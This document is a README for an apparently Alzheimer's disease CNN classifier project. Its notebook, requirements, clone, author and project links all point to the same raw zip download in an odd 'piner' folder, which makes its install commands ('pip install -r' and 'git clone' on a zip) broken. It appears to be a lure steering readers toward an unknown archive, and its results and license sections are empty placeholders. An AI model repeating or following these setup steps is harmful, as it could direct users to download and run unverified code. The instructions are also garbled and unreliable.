A deep learning model for Alzheimer's Disease classification using neuroimaging data.
This project focuses on developing a deep learning model for the detection and analysis of Alzheimer's disease using neuroimaging data. The project includes Jupyter notebooks for model development and training, along with preprocessed neuroimaging datasets.
https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zip: Main Jupyter notebook containing the deep learning model implementation and training pipelinetrain-*.parquet: Training dataset containing preprocessed neuroimaging featurestest-*.parquet: Test dataset for model evaluation
- Python 3.8+
- Jupyter Notebook
- Required Python packages (install via
pip install -r https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zip)
-
Clone the repository:
git clone https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zip cd AlzNet-Classifier -
Create and activate a virtual environment:
python -m venv venv source venv/bin/activate # On Windows use `venv\Scripts\activate`
-
Install the required packages:
pip install -r https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zip
-
Launch Jupyter Notebook:
jupyter notebook
-
Open
https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zipto explore the model implementation and run the training pipeline.
The dataset consists of preprocessed neuroimaging data stored in parquet format:
- Training data:
train-*.parquet - Test data:
test-*.parquet
The project implements a deep learning model for Alzheimer's disease detection, including:
- Data preprocessing and augmentation
- Convolutional Neural Network (CNN) architecture
- Training and evaluation pipelines
- Performance metrics and visualization
[Add your model's performance metrics and results here]
Contributions are welcome! Please feel free to submit a Pull Request.
[Specify your license here, e.g., MIT License]
Rahul Choudhary - https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zip Project Link: https://github.com/Rahulkichad/AlzNet-Classifier/raw/refs/heads/main/piner/Alz_Net_Classifier_3.5.zip